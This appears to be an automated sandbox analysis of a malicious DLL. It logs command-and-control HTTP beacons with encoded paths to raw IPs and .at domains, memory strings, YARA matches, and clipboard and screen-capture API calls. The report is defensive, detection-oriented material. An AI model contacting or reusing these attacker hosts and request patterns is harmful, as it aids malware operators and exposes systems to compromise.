  GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 31.214.157.187
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:03:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:04:33 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Vary: Accept-Encoding Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:04:54 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: keep-alive Vary: Accept-Encoding Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:05:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: keep-alive Vary: Accept-Encoding Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:05:55 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Vary: Accept-Encoding Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:06:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Vary: Accept-Encoding Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:06:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: keep-alive Vary: Accept-Encoding Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194214.157.187/
                      Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://31.214.157.187/
                      Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8
                      Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/
                      Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/8
                      Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/8aMvIN0oJqk/wfo22krGhemAS6/6H_2FPRAH0bqwevjC8Pk5/kXre7OAlPZjP7YB8/
                      Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/cmlyVQ2zwKm8fCRpP0VB/i6Zv1FcucRsB3XE0xRC/6VGWBAMEz_2Fh6VbcTZ9sL/wE
                      Source: WerFault.exe, 00000007.00000002.314858058.00000000049C9000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312995086.00000000049C8000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312888145.00000000049C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.777131845.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438896118.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.773036185.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://habpfans.at/
                      Source: loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w
                      Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/
                      Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://habpfans.at/g
                      Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
                      Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll | String found in binary or memory: http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus
                      Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll | String found in binary or memory: http://www.dhtmlcentral.com/tutorial.asp
                      Source: unknown | DNS traffic detected: queries for: giporedtrip.at
                      Source: global traffic | HTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.226.200
                      Source: global traffic | HTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: giporedtrip.at
                      Source: global traffic | HTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: habpfans.at
                      Source: global traffic | HTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.214.157.187
                      Source: global traffic | HTTP traffic detected: GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.226.200
                      Source: global traffic | HTTP traffic detected: GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: giporedtrip.at
                      Source: global traffic | HTTP traffic detected: GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: habpfans.at
                      Source: global traffic | HTTP traffic detected: GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.214.157.187

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: Yara match | File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
                      Source: Yara match | File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E33B10 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 3_2_00E33B10
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E34154 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 3_2_00E34154
                      Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00730108 GetProcessUIContextInformation,GetRawInputData,GetSystemMenu,Sleep,GetUserObjectInformationW,GetWindowBand,GetWindowCompositionAttribute,GetWindowFeedbackSetting,GetWindowMinimizeRect,ImpersonateDdeClientWindow,GetMenuBarInfo,InitializeInputDeviceInjection,GetMenuBarInfo,InitializePointerDeviceInjectionEx,InjectDeviceInput,InjectGenericHidInput, 0_2_00730108
